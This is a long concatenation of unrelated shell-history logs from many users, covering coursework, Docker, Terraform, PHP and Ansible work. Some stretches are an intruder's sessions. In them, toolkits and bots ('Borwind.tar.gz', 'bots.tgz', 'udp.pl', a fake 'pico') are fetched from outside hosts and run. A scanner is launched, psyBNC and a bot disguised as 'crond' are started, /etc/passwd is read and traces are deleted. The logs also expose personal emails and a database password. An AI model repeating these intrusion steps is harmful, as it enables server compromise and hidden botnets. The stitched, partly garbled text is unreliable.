upgrade +ls -l /etc/hosts +sudo emacs /etc/hosts +sudo apt-get install emacs -y +echo "export EDITOR=emacs" >> "$HOME/.profile" +sudo emacs /etc/hosts +sudo ls +sudo su root +su nginx +sudo su root +su nginx +exit +su nginx +sudo passwd nginx +su nginx +sudo su nginx +exit +ls +sudo su nginx +exit +sudo su nginx +exit +sudo su nginx +exit +ls +ls +ls +ls +ls +ls +ls +ls +pwd +exit +docker ps +ls +nano ubuntu.sh +ls +ls +nano Dockerfile +docker build -t confserv . +docker image ls +docker rmi 7a6 +ifconfig +docker rmi 7a6 +docker build -t confserv . +docker run --name confser_cont -it confserv +ls +ls +nano app.test.js +ifconfig +ls +ls +nano .dockerignore +nano Dockerfile +clear +docker build -t LatiNode . +docker ps -a +ls +nano Dockerfile +docker build -t LatiNode . +clear +docker build -t latinode . +docker ps -a +docker image ls +docker run -p 4000:4000 latinode +ls +sudo +ls +sl +ls +ls +ls +ls data301/ +ls +ls +ls +ls +ls +clear +ls -l * +clera +clear +ls -r * +clear +ls -r * +clear +ls +ls +chmod u+rwx +chmod +chmod --help +man chmod +chmod 700 * +ls +ls -al +clear +ls +vim +clear +ls +echo a +clear +sudo apt-get update +clear +ls +ls +lbgrader list --course data301 +nbgrader list --course data301 +npgrader fetch --data301 day* +nbgrader fetch --data301 day +nbgrader fetch --data301 day01 +nbgrader fetch --course data301 day01 +ls +ls +clear +ls +cat Syllabus.ipynb +clear +ls +clear +ls +clear +ls +git clone --recursivescience/data301.git +ls +ls +cat Makefile +ls +ls +cat README.md +ls +ls +ls +ls +clear +ls +make update +ls +ls +vim Data301\ 01-09-2017.txt +cat Data301\ 01-09-2017.txt +clear +vim Data301\ 01-09-2017.txt +ls +rm Data301\ 01-09-2017.txt +ls +clear +ls +ls +df -h +clear +ls +ls +chmod 700 * +ls +chmod 700 *.* +chmod -r u=rwx,g=r,o= +chmod -R 700 * +ls +htop +clear +c = get_config() +ls +vim nbgrader_config.py +ls +vim nbgrader_config.py +ls +clear +ls +clear +ls +mv ~/.jupyter +mv nbgrader_config.py ~/.jupyter +ls +ls -al +ls +clear +ls +mkdir -p ~/.jupyter +clear +df -h +htop +lspci +lsusb +lshw +sudo lshw +clear +htop +clear +PS1='[PEXP\[\]ECT_PROMPT>' PS2='[PEXP\[\]ECT_PROMPT+' PROMPT_COMMAND='' +export PAGER=cat +display () { TMPFILE=$(mktemp ${TMPDIR-/tmp}/bash_kernel.XXXXXXXXXX); cat > $TMPFILE; echo "bash_kernel: saved image data to: $TMPFILE" >&2; } +ls +ls +cat untitled.txt +rm untitled.txt +ls +ls +ls -al +clear +ls -al +ls +cat migrated +mkdir -p .jupyter +ls +clear +man ls +clea +clear +ls -al +npgrader fetch --course data301 day02 +clear +ls +nbgrader +npgrader fetch --course data301 day02 +nbgrader fetch --course data301 day02 +ls +ls +clear +ls +cat Day02.ipynb +clear +touch nbgrader_config.py +ls +ls +ls +ls +./00-Introduction.ipynb +clera +clear +ls +jupyter 00-Introduction.ipynb +clear +python -V +python3 -V +python +clear +ipython +jupyter +clear +ls +nbgrader fetch --course data301 ps1 +ls +ls +cat BasicVectorOps.ipynb +df -h +htop +clear +tmux +nbgrader list +nbgrader fetch day03 +ls +nbgrader fetch --course data301 day03 +nbgrader fetch --course data301 ps2 +nbgrader validate * +nbgrader submit --course data301 ps1 +make update +make update +ls +rm -rf ps2/ +rm -rf day03/ +ls +nbgrader fetch --course data301 day03 +nbgrader submit --course data301 ps2 +nbgrader list +nbgrader fetch --course data301 ps2 +clear +nbgrader list +nbgrader list +nbgrader fetch --course data301 day04 +nbgrader fetch --course data301 ps3 +ls +nbgrader validate * +nbgrader submit --course data301 ps2 +clear +ls +make update +make update +clear +sl +htop +ls +cat cipher.txt +cp cipher.txt ~/ +ls +ls +nbgrader validate +nbgrader validate * +nbgrader submit --course data301 ps3 +clear +s +nbgrader fetch --course data301 day04/ +make update +ls +nbgrader fetch --course data301 day05 +clear +ls +make update +clear +ls +ls +nbgrader validate * +nbgrader submit --course data301 . +nbgrader list +nbgrader fetch --course data301 day05 +nbgrader fetch --course data301 ps3 +nbgrader fetch --course data301 +nbgrader fetch --course data301 ps4 +clear +ls +ls +nbgrader validate * +nbgrader submit --course data301 . +ls +nbgrader submit --course data301 ps4/ +clera +clear +ls +nbgrader list --course data301 +ls +make update +clear +exit +htop +clear +df -h +clear +ls +nbgrader list --course data301 +nbgrader fetch --course data301 day06 +nbgrader fetch --course data301 ps5 +ls +ls +nbgrader validate * +nbgrader submit --course data301 . +ls +ls +make update +clear +ls +htop +clear +ls +ls +clear +ls +ls +cat FlightsEDA.ipynb +clear +ls -al +ls +cat stopwords.txt +ls +ls +clear +make update +ls +clear +nbgrader validate . +nbgrader list --course data301 +nbgrader fetch --course data301 day07 +nbgrader fetch --course data301 ps6 +nbgrader validate * +nbgrader validate *.ipynb +ls +ls +nbgrader submit --course data301 . +nbgrader validate *.ipynb +nbgrader submit --course data301 . +clear +ls +htop +ls +clear +ls +ls +rm -rf ps6/ +nbgrader fetch --course data301 ps6 +clear +ls +htop +clea +clear +htop +htop -u dsingal +htop -u dhruvsus +ls +htop -u dhruvsus +ls +ls +nbgrader validate --course data301 * +nbgrader validate * +nbgrader validate * && nbgrader submit --course data301 . +nbgrader list --course data301 +nbgrader fetch --course data301 ps7 +nbgrader fetch --course data301 day08 +htop +htop -u dhruvsus +ls +clear +htop +clear +htop -u dhruvsus +ls +ls +ls -al +clear +ls +htop -u dsingal +htop -u ddhruvsus +htop -u dhruvsus +clear +ls +ls +ls +ls +clear +ls +cat SLOPolice_TDGAcq2016-07-29-2347.txt +clear +cat SLOPolice_TDGAcq2016-07-29-2347.txt +clear +cat SLOPolice_TDGAcq2016-07-29-2347.txt +clear +more SLOPolice_TDGAcq2016-09-26-1700.txt +clear +htop -u dhruvsus +clear +nbgrader fetch --course data301 +nbgrader list --course data301 +clear +nbgrader validate . +ls +nbgrader validate * +nbgrader submit --course data301 . +ls +nbgrader fetch --course data301 midterm +ls +clear +ls +ls +nbgrader validate . +nbgrader validate * +nbgrader submit --course data301 . +clear +ls +ls +nbgrader list +clar +clear +ls +clear +ls +nbgrader list +clear +ls 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--cached data301/. +ls +git commit +git push origin master +ls +clear +alias +man alias +zsh +clear +ls +clear +ls +alias nlist="nbgrader list" +nlist +clear +alias ngrade="nbgrader validate" +alias nsumbit="nbgrader sumbit --course data301" +alias nfetch="nbgrader fetch --course data301" +alias +clear +alias +make update +ls +nlist +nbgrader list +nbgrader fetch ps8 +nbgrader fetch --course data301 ps8 +git add ps8/ +ls +git add . +git commit +git push origin master +ls +ls +make upate +make update +echo "alias nlist="nbgrader list"">> .mybashrc +ls +ls -al +echo "alias nlist="nbgrader list"">> .bashrc +cat .bashrc +clar +echo "alias nfetch="nbgrader fetch --course data301"">>.bashrc +alias ngrade="nbgrader validate" +alias nsumbit="nbgrader sumbit --course data301" +echo "alias nsumbit="nbgrader sumbit --course data301"">>.bashrc +echo "alias ngrade="nbgrader validate"">>.bashrc +cat .bashrc +source .bashrc +vim .bashrc +source .bashrc +nlist +clear +ls +git add . +git commit +git push +git pull +git push +clear +pwd +/bin/pwd +clear +cat /bin/pwd +clear +ls +alias +nbgrader validate * +nsubmit . +vim ./../.bashrc] +vim ./../.bashrc +source ./../.bashrc +nsubmit . +echo nsubmit +nsubmit +nbgrader submit --course data301 . +clear +ls +nblist +ls +alias +nlist +nfetch day11 +nfetch ps9 +clear +ls +nfetch +nlist +nfetch day12 +nfetch ps10 +w +id +ls +./start +ping +ssh +ping +ls +ps auxZ +ssh +ping +ping +df +help +ping +ping +ping +ssh +ssh +ping +ssh$ +./toto.sh +w +echo "echo aaa" toto.sh +vim toto.sh +./toto.sh +vim toto.sh +./toto.sh +ls +ping +ping +ping +touch /tmp/toto +touch /tmp/toto +vim toto.sh +./toto.sh +./toto.sh +./toto.sh +vim toto.sh +./toto.sh +./toto.sh +./toto.sh +./toto.sh +vim toto.sh +./toto.sh +vim toto.sh +./toto.sh +ping +ssh +ping +ssh +vim toto.sh +./toto.sh +uptime +vim toto.sh +./toto.sh +ssh +wget +ping +ssh +ping +ssh +ftp localhost +telnet localhost 21 +ping +./toto.sh +vim toto.sh +./toto.sh +ping +ping +ping +ping +ssh +ping +vim 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/etc/hercules/hercules.cnf debian/debian.cnf +vi debian. +vi debian.cnf +ls +less debian.exec +hercules -f debian.cnf +vi debian.cnf +hercules -f debian.cnf +vi debian.cnf +hercules -f debian.cnf +ls +vi debian.cnf +hercules -f debian.cnf +ls +vi debian. +vi debian.cnf +ls +ls +vi debian/debian. +vi debian/debian.cnf +hercules -f debian.cnf +vi debian/debian.cnf +vi debian.cnf +hercules -f debian.cnf +vi debian.cnf +hercules -f debian.cnf +vi debian.cnf +hercules -f debian.cnf +vi debian.cnf +hercules -f debian.cnf +vi debian.cnf +hercules -f debian.cnf +ls +ls +ls +ls +l +cp ../debian/debian.cnf sles9.snf +su +hercules -f sles9.cnf +vi sles9.cnf +hercules -f sles9.cnf +ls +vi sles9.cnf +cp sles9.cnf sles9.cnf.loader +su +ls +cp sles9.cnf sles9.cnf.loader +vi sles9.cnf +ls +vi sles9.cnf +hercules -f sles9.cnf +ls +ls +ls +less debian.exec +su +x3270 +bg 1 +zypper in firefox +su +firefox file:/usr/share/hercules/ +bg 2 +ls +ls +ls +ls +rpm -qa hercules +rpm -ql hercules +rpm -ql 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+docker run -it -d -p 82:80 nikhilsharma6311/apache +ifconfig +docker ps +docker exec -it 8d9b1ae762e4 bash +docker login +docker push nikhilsharma6311/apache:revise +docker push nikhilsharma6311/revise:nikhilsharma6311/apache +docker push nikhilsharma6311/apache +clear +docker images +docker push nikhilsharma6311/revise:latest +docker push nikhilsharma6311/revise:nikhilsharma6311/apache +docker push nikhilsharma6311/revise +clear +docker images +docker push nikhilsharma6311/revise:nikhilsharma6311/apache +clear +docker ps +docker rm -f +docker rm -f 8d9b1ae762e4 +clear +ls +mkdir dockerfile +vi dockerfile.txt +docker dockerfile.txt config +vi 1.html +ls +clear +docker build . -t dockerfile +docker build . -t newdockerfile +vi dockerfile.txt +docker build . -t newdockerfile +ls +mv dockerfile.txt dockerfile +vi dockerfile.txt +vi dockerfile +docker build . -t newdockerfile +vi dockerfile +docker build . -t newdockerfile +vi dockerfile +docker build . -t newdockerfile +vi dockerfile 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8100abeaa4f1 bash +docker volume create test +docker volume ls +docker run -it --mount source=test,target=/var/www/html -d ubuntu +docker exec -it 5206fafbf3aa0ace8244aadea80e3ecb7e0e1f383cdcc05a8a0d86e4c2796531 bash +clear +docker run -it --mount source=test,target=/ -d ubuntu +docker run -it --mount source=test,target=/var -d ubuntu +docker exec -it 082b5f70e77977585e8e627d591298e1006662c9edae122f086a8813aa282abb bash +docker ps +vi 3.txt +clear +ls +docker ps +docker cp ./3.txt 082b5f70e779:/var +docker rm -f $(docker ps -a -q) +clear +docker run -it --mount source=test,target=/var -d ubuntu +docker exec -it 20bfe5bcc9672be8f6f1a72ba335da120608a007b9abe63f067661822b441c44 bash +clear +docker images +docker volume create apache +docker voulme ls +docker volume ls +clear +docker run -it --mount source=apache,target=/var/www/html -p 85:80 -d newdocker +docker images +docker run -it --mount source=apache,target=/var/www/html -p 85:80 -d newdockerfil +docker ps +docker-compose +docker-compose --version +clear +mkdir compose +vi wordpree.yaml +clear +mv wordpree.yaml docker-compose.yml +docker compose up -d +docker-compose up -d +clear +vi docker-compose.yml +docker-compose docker-compose.yml config +docker-compose up -d +vi docker-compose.yml +docker-compose up -d +vi docker-compose.yml +docker-compose up -d +doocker ps +docker ps +ifconfig +vi docker-compose.yml +ifconfig +reboot +clear +ifconfig +reboot +clear +ls +vi docker-compose.yml +service docker start +docker-compose up -d +docker ps +ifconfig +docker-compose up -d +ls +service docker start +docker-compose up -d +ls +ls +car docker-compose.yml +cat docker-compose.yml +docker-compose up -d +docker ps +ifconfig +clear +docker swarm init --advertise-addr= +service firewalld stop +docker swarm node +docker swarm node ls +docker node ls +clear +exit +hostname +ifconfig +clear +exit +clear +ls +vi authorized_keys +exit +mkdir Code +mkdir cis206 +mkdir hello-world +vim Main.java +mkdir Code +javac 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gttps://github.com/CISVVC/cis206-decisions-slament00.git +echo "# cis206-decisions-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add orgins206-decisions-slament00.git +git push -u orgin master +ls +vim Main.java +ls +mkdir cis206-wordReversal-slament00 +ls +vim Main.java +ls +csd +ls +cs +vim Main.java +ls +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +ls +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +javac Main.java +java Main +vim Main.java +javac Main.java +java Main +vim Main.java +javac Main.java +java Main +echo "cis206-wordReversal-slament00" >> README.md +get init +git init +git add README.md +git commit -m "first commit" +git remote add orgins206-wordReversal-slament00.git +git push -u orgin master +vim Main.java +git remote add orgins206-wordReversal-slament00.git +git push -u orgin master +ls +vim Main.java +javac Main.java +java Main +vim Main.java +ls +vim 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origins206-loops-word-reversal-slament00.git +git push -u origin master +ls +vim Main.java +javac +javac Main.java +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +ls +vim Main.java +javac Main.java +vim Main.java +javac Main.java +java Main +vim Main.java +git add . +git -a -m 'update' +git commit -a -m 'update +dwa +dwadaw +ey,h +[KbgkI +jgfIQ}_IF3H]tgj +paogj +[slgagagksdgkq34tq6iq + +]]\ + + + + + + + + + + + + + +ls +git add . +git commit -a -m 'update' +git push +git add . +git commit -a -m 'update' +git config +git push +git add . +git commit -a -m 'update' +vim Main.java +git remote add origins206-word-scramble-slament00.git +git push -u orgin master +echo "# cis206-loops-word-reversal-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-loops-word-reversal-slament00.git +ls +vim Main.java +l +slsl +ls +ls +vim Main.java +vim Main.java +ls +vim Main.java +git add . +git commit -a -m 'update' +git push +git config --global user.email "slament00@gmail.com" +git config --global user.name "slamen tokhi" +git push +ls +ls +git add . +git commit -a -m 'update' +git pusgh +git push +ping github.com +git push +ls +ls +ls -atlhr +ls +git add . +git commit -a -m update +git push +git pull +ls +cp -rp cis206-word-scramble-slament00 wordscramble_backup +ls +git pull +ls +ls -0althr +ls -atlhr +cat README.md +git push +ls -atlhr +ls -atlhr +mkdir temp +mv cis206-word-scramble-slament00 temp/. +git clones206-word-scramble-slament00.git +cp temp/cis206-word-scramble-slament00/Main.java . +ls +pwd +ls +ls +ls +ls +mv ../Main.java . +ls +vi Main.javca +ls +vim Main.java +javac Main.java +vim Main.java +javac Main.java +java Main +ls +git commit -a -m update +git push +ls +vim Main.java +echo "# cis206-loops-word-reversal-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-loops-word-reversal-slament00.git +git push -u origin master +git add . +git -a -m update +git commit -a -m update +git push +l +mv /cis206-wordReversal-slament00 /cis206-loops-word-reversal-slament00 +ls +sudo write /Library/Preferences/com.apple.loginwindow LoginwindowText "Welcome Slamen" +nc towel.blinkenlights.nl 23 +emacs +snake +ruby -e 'C=`stty size`.scan(/\d+/)[1].to_i;S=["2743".to_i(16)].pack("U*");a={};puts "\033[2J";loop{a[rand(C)]=0;a.each{|x,o|;a[x]+=1;print "\033[#{o};#{x}H \033[#{a[x]};#{x}H#{S} \033[0;0H"};$stdout.flush;sleep 0.1}' +mk dir +mk dir theater +ls +echo "#cis206-array-project-slament00" >> READ.md +git init +git add READ.md +git commit -m "first commit" +git remote add orginslament00.git +git push -u orgin master +git remote add orgins206-array-project-slament00.git +echo "# cis206-array-project-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-array-project-slament00.git +git push -u origin master +ls +git remote add orgins206-array-project-slament00.git +mk dir cis-206-project-slament00 +mkdir cis-206-project-slament00 +ls +ls +echo "# cis206-array-project-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-array-project-slament00.git +git push -u origin master +echo "# cis206-array-project-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-array-project-slament00.git +git push -u origin masterecho "# cis206-array-project-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-array-project-slament00.git +git push -u origin masterecho "# cis206-array-project-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-array-project-slament00.git +git push -u origin masterecho "# cis206-array-project-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-array-project-slament00.git +git push -u origin masterecho "# cis206-array-project-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-array-project-slament00.git +git push -u origin master +echo "# cis206-array-project-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-array-project-slament00.git +git push -u origin master +echo "# cis206-array-project-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-array-project-slament00.git +git push -u origin master +fetch +git remote add origins206-array-project-slament00.git +git push -u origin master +git remote add origins206-array-project-slament00.git +ls +mkdir cis206-array-project-slament00 +ls +vim Main.java +ls +git clones206-midterm-slament00.git +ls +echo "# cis206-midterm-slament00" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origins206-midterm-slament00.git +git push -u origin master +vim Main.java +javac Main +javac Main.java +java Main +5 +java Main +ls +git add +git add . +git commit -m -p +git push +ls +git add. +git add +git add . +git add . cis206-objects-slament00 +ls +git push +vim Main.java +mkdir cis206-objects-slament00 +ls +vim Main.java +javac main +vim Main.java +javac main +vim Main.java +javac main +vim Main.java +javac main.java +javac Main.java +vim Main.java +javac Main.java +java Main +Main.java +java Main +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +javac Main.java +java Main +vim Main.java +javac Main.java +java Main +vim Main.java +javac Main.java +java Main +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java +javac Main.java +vim Main.java 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doctor +yodoctor +yo --allow-root doctor +chmod g+rwx /root /root/.config /root/.config/configstore +chmod g+rwx /root /root/.config /root/.config/configstore/insight-yo.json +yo --allow-root doctor +chown -R $USER:staff ~ +yo --allow-root doctor +yo -v +sudo chown -R $USER /usr/local/lib/node_modules/ +chown -R $USER /usr/local/lib/node_modules/ +chown -R $USER $HOME/.npm +chown -h +chown -R $USER:staff ~ +chown -R $USER $HOME/.npm +chown -R $USER $HOME/.npm ~ +chown -R root /root/.npm +chown -R root /usr/local/lib/node_modules/ +ls +ls +npm install +gulp serve +npm install -g gulp-cli +exit +ls +npm install +gulp serve +service mongodb start +gulp serve +gulp serve +exit +ls +npm install iltorb@1.0.13 +npm install node-sass@3.8.0 +exit +gulp serve +exit +ls +git remote add origin +ls +ls root/ +git status +git init +git remote add origin +gi status +git status +git add . +git commit -am "First commit" +git config --global user.email "pcamposred@gmail.com" +git config --global user.name "Pablo Campos" +git commit -am "First commit" +git push -u origin master +exit +ls +gulp serve +gulp build +node -v +npm install -g n +n -h +n latest +gulp build +n +node -v +n 6.2.2 +node -v +gulp build +npm install gulp-imagemin +gulp build +gulp serve +npm install angular-socialshare --save +gulp serve +gulp build +npm uninstall optipng-bin +npm install optipng-bin +gulp build +NODE_ENV=production node./server +NODE_ENV=production node./server +NODE_ENV=production node ./server +ls +ls server/ +ls +ls -la +ls +git status +git add . +git commit -am "Analytitcs code" +git push +git commit -am "Image og" +git commit -am "Getsitecontrol code" +git push +exit +ls +gulp serve +service mongodb start +gulp serve +gulp serve +git status +git add . +git commit -am "Form for creating news and news showed in main" +exit +ls +gulp serve +service mongodb start +gulp serve +npm install angularjs-datepicker --save +gulp serve +git status +git add . +git commit -am "Added some new features." +mkdir ./.ssh +mv id_rsa .ssh/ +git push +ls .ssh/ +ls -la .ssh/ +git push +git push +gulp build +gulp build +gulp serve +gulp build +git commit -am "Added some new features." +git push +gulp build +gulp serve +git commit -am "Don't allow signup from now" +git push +ssh ubuntu@wellfitcontrol.com +ls .ssh/ +ssh-add .ssh/id_rsa +touch .ssh/config +nano .ssh/config +exit +ls +gulp serve +service mongodb start +gulp serve +git status +git add . +git status +rm -r .ssh +git status +git rm +git rm . +git add/rm +git status +git commit -am "Pre-launch" +git push +git status +git push +exit +ls +gulp serve +gulp serve +gulp build +gulp serve +exit +ls -a +ls +rm -rf vuln.txt 130.28.pscan.22 +wget Borwind.uv.ro/Borwind.tar.gz +mkdir " " +ls -a +wget Borwind.uv.ro/Borwind.tar.gz +ls +rm -rf * +ls -a +wget Borwind.uv.ro/Borwind.tar.gz +tar xzvf Borwind.tar.gz +rm -rf .Bor +ls -a +rm -rf Borwind.tar.gz +ls +./start 202.51 +mkdir .muie +wget ciuciushop.com/bots.tgz +tar xzvf bots.tgz +rm -rf bots.tgz +ls +pico +ftp + wget admin02.home.ro/tmp/pico +chmod +x pico +./pico mech.set +pico unix1.users +./pico unix1.users +./pico unix2.users +./pico unix3.users +ls +chmod +x crond +export PATH="." +crond +crond +crond +crond +crond +pwd +ssh-keygen +cat /home/ec2-user/.ssh/id_rsa.pub +pwd +mkdir terraf +git init +git remote add origin git@github.com:milanojs/terra_lab5.git +git fetch --all ; git pull --all +git branch --set-upstream-to=origin master +git checkout origin master +git pull --all +git status +git branch -a +git pull origin/master +git pull origin master +git fetch --all +git pull --all + git branch --set-upstream-to=origin/ master + git branch --set-upstream-to=origin/master +wgetsite-on-aws/raw/master/config.zip -O tf.zip +unzip tf tf.zip +ls -laht +unzip -d tf tf.zip +rm tf.zip +ls -laht +git add tf +git config --global user.name "Juan Milano" +git config --global user.email juan_milano@hotmail.com +history -w +git add +ls -laht +git status +git commit -m "agregar primeros tf" +git push origin master +wgetses.hashicorp.com/terraform/0.11.3/terraform_0.11.3_linux_amd64.zip -O /tmp/tf.zip +sudo unzip /tmp/tf.zip -d /usr/local/bin +terraform fmt -check +echo $? +terraform fmt +terraform fmt -check +terraform fmt +terraform validate +terraform plan +terraform init +terraform plan +terraform validate +terraform plan +wgetses/download/v0.5.4/tflint_linux_amd64.zip -O /tmp/tflint.zip +sudo unzip /tmp/tflint.zip -d /usr/local/bin +tflint -h +history -w +tflint +tflint --error-with-issues +echo $? +tflint --error-with-issues --ignore-rule=aws_instance_not_specified_iam_profile +echo $? +tflint --deep --aws-region=us-west-2 +tflint --error-with-issues --ignore-rule=aws_instance_not_specified_iam_profile --debug +history -w +pwd +ls -laht +pwd +virtualenv scan +source scan/bin/activate +pip install terrascan +ls -laht +ls- +ls -laht +ls -laht +terrascan +terrascan -h +terrascan --location . --tests security_group +deactivate +git status +git status +echo "tf/.terraform" > .gitignore +git add .gitignore +git status +git add tf +git status +git commit -m "revisar cambios" +git push origin master +history -w ; cp $HOME/bash_history . +history -w ; +ls -laht +cat .bash_history +cp $HOME/.bash_history . +git status +git add .bash_history +git commit --am +git push +git push origin master +git fetch +git pull --all +git push origin master +aws ec2 describe-instances --filters "Name=tag:Type,Values=Build" --query "Reservations[0].Instances[0].PublicDnsName" | sed 's/"\(.*\)"/http:\/\/\1\/manage/' +ls -laht +repo_url=$(aws ec2 describe-instances --filters "Name=tag:Type,Values=Build" --query "Reservations[0].Instances[0].PublicDnsName" \ + | sed 's/"\(.*\)"/git:\/\/\1\/lab.git/') +git clone $repo_url src +cp tf/*tf tf/*sh src +cp terraf/tf/*tf tf/*sh src +ls -laht +git add -A +git commit -m "Initial commit" +git push +echo >> main.tf # add a new line to the end of the file +git commit -a -m "Second commit" +git push +ls -laht +history -w +history -w +ls -laht +ls +rm c3-2017-05-23-70.pdf +rm c3-2017-05-23-80.pdf +rm c3-2017-05-23-96.pdf +rm c3-2017-05-23-99.pdf +rm c3-2017-05-23-34.pdf +rm c6-2017-05-23-34.pdf +rm c6-2017-05-23-36.pdf +ls +ls +ls +ls +ls -l +git add . +git commit -m "视图详情有问题" +git push orgin dev +git push origin dev +git pull +mysql -u root -p +ls +vi yii.conf +vi yii-test.conf +ls +pwd +useradd -d /usr/share/nginx/html/advanced-test +useradd -d /usr/share/nginx/html/advanced prod +passwd prod +usermod -s /sbin/nologin prod +service vsftpd restart +userdel -r prod +ls +ls +vi view.php +vi index.php +mysql -u root -p +ls +vi main-local.php +composer update +composer update +composer install +composer update +ls +composer +composer show +composer update yiisoft/yii2 +ls +ls +vi view.php +mysql -u root -p +ls +vi index.php +reboot +composer config -g repo.packagist composerst.phpcomposer.com +ls +vi composer.json +ls +composer install +composer update +composer update config.fxp-asset.installer-paths +composer update +composer global require fxp/composer-asset-plugin:^1.2.0 +composer update +compoesr show +composer show +composer global require "fxp/composer-asset-plugin:*" +composer install +ls +rm -rf vendor/ +rm composer.lock +composer install +ls +vi main-local.php +ls +./yii init +init +./init +pwd +/usr/share/nginx/html/advanced-test +crontab -e 00 09 * * * /usr/share/nginx/html/advanced-test/yii check-contracts/collect +crontab -e +composer require scotthuangzl/yii2-export2excel "dev-master" +compoesr update +composer update +ls +ls +vi php.ini +reboot +git add . +./yii migrate/create add_column_for_contract +mysql -u root -p +./yii migrate/up +git add . +git commit -m "端午节前的最后Push" +git push origin dev +git pull +composer update +composer show +composer show +composer require scotthuangzl/yii2-export2excel "dev-master" +git pull +git add . +git commit -m "为正式环境配置做设置" +git push +git checkout +git push origin master +git pull +git add . +git commit -m "解决beforeaction的登录前验证问题" +git push origin dev +git pull +git commit -a +git pull +git add . +git commit -m "解决注销后不跳转登录的问题" +git push origin dev +git pull +crontab -e +./yii check-contracts/collect +git add . +git commit -m "检查是否有未同步" +git push origin dev +git pull +./yii migrate +mysql -u root -p] +mysql -u root -p +git add . +git commit -m "修复bug" +git push origin dev +git add . +git commit -m "刚才push不成功?" +git push origin dev +git pul +git pull +git push origin dev +ls +git add . +git commit -m "修改管理员及客户的信息,但密码暂时不可以,修复了一些bug" +git push origin dev +ls +git pull +mysql -u root -p +git add . +git commit -m "完善了模块显示,修复产品图片更新bug,菜单栏新增我的合同模块" +git push origin dev +git pull +mysql -u root -p +crontab -e +mysql -u root -p +ls +ls +ls +vi yii.conf +vi progress.conf +ls +pwd +mysql -u root -p +ls -l +chmod 777 progress.sql +mysql -u root -p +mysql -u root -p Ww070101 progress advanced.sql +mysqldump -u root -p advanced > advanced.sql +ls +ll +ls +ls +vi index.php +vi index.php +ls +vi yii.conf +pwd +pwd +ls +ll -a +vi .gitignore +pwd +ls +ll -a +vi .gitignore +pwd +git add . +git commit -m "将backend/uploads文件夹中文件补传 +" +git push +git push origin +git push origin master +git pull +git push +pwd +ls +pwd +ls +pwd +ls + cd advanced-test/ +ls +ls +ls +mv progress.conf progress.conf.bak +mv yii.conf yii.conf.bak +mv yii-test.conf yii-test.conf.bak +ls +vi yii.conf.bak +ls +pwd +ls +vi progress.conf.bak +vi yii-test.conf.bak +reboot +vi /etc/hosts +ls +vi yii.conf.bak +ls +vi yii.conf.bak +ls +vi yii.conf.bak +ls +vi yii.conf.bak +vi yii-test.conf.bak +ls +ls +vi nginx.conf +ls +ls +pwd +ls +ls +reboot +vi /etc/hosts +ls +vi yii.conf.bak +vi progress.conf.bak +pwd +ls +vi yii.conf.bak +ls +mysql -u root -p +pwd +ls +ls +git pull +ll -a +vi .gitignore +vi .git +ls +ls +pwd +ls +ls +ls +pwd +ls +ls +pwd +ls +ls +ls +ls +pwd +ls +ls +ls +ls +ls +pwd +ls +ls +pwd +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls -l +pwd +git add . +git commit -m "合同付款频率加入按年" +pwd +git push origin dev +pwd +ls +ls +git add . +git commit -m "在we-chat/中重新开启验证微信公众号url" +git push origin dev +git add . +git commit -m "在we-chat/中重新开启验证微信公众号url" +git push origin dev +git add . +git commit -m "在we-chat/中重新开启验证微信公众号url" +git push origin dev +git add . +git commit -m "url验证成功" +git push origin dev +git add . +git commit -m "修改we-chat/内为阿里云正式环境地址" +git push origin dev +pwd +git add . +git commit -m "测试获取at" +git push origin dev +git add . +git commit -m "测试获取at" +git push origin dev +git add . +git commit -m "测试菜单" +git push origin dev +git add . +git commit -m "个人中心有问题" +git push origin dev +git add . +git commit -m "个人中心有问题" +git push origin dev +w +uname -a +w +uname -a +ls -a +cat /proc/cpuinfo +exit +w +cat /proc/cpuinfo +wgetsnake.uv.ro/udp.pl +ls +exit +w +ls +uname -a +cat /etc/issue +ls +ls +ls +ls -all +ls +./start +cat vuln.txt +./start 66.218 +ls +ls +ls -all +passwd test6 +ls +passwd +passwd +wgets.com/cocosel_01/linux-archives/b.tgz +tar xzvf b.tgz +chmod +x x +ls +./x +./x +ls +ps -u test6 +ls +ls +pico +vi psybnc.conf +ls +./psybnc +killall -9 psybnc +ps aux +cat /etc/hosts +cat /etc/passwd +ls +ls -all +ls +ls +ls -all +ls +ls +ls +ls -all +rm -rf * +ls +exit +vim /etc/ansible/hosts +ls +mkdir roles +ansible-galaxy init win_ad_install +ls +rm -rf win_ad_install/ +ls +rm -rf win_ad_install/ +ansible-galaxy init win_ad_install +ls +ls +ls +vim main.yml +vim install_ad_service.yml +vim ad_controller.yml +vim reboot.yml +ansible - m win_ping windows +ansible -m win_ping windows +vim print_domainlist.yml +ls +vim main.yml +ls +vim ad_controller.yml +ls +ls +ls +vim inventory +vim test.yml +ls +vim ad.yml +ansible-playbook ad.yml +ls +ls +vim main.yml +ansible-playbook ad.yml +vim tasks/main.yml +vim tasks/print_domainlist.yml +ansible-playbook ad.yml +vim win_ad_install/tasks/print_domainlist.yml +ansible-playbook ad.yml +vim win_ad_install/tasks/print_domainlist.yml +ansible-playbook ad.yml +vim win_ad_install/tasks/print_domainlist.yml +ansible-playbook ad.yml -e "GUID=2b3b" +vim win_ad_install/tasks/print_domainlist.yml 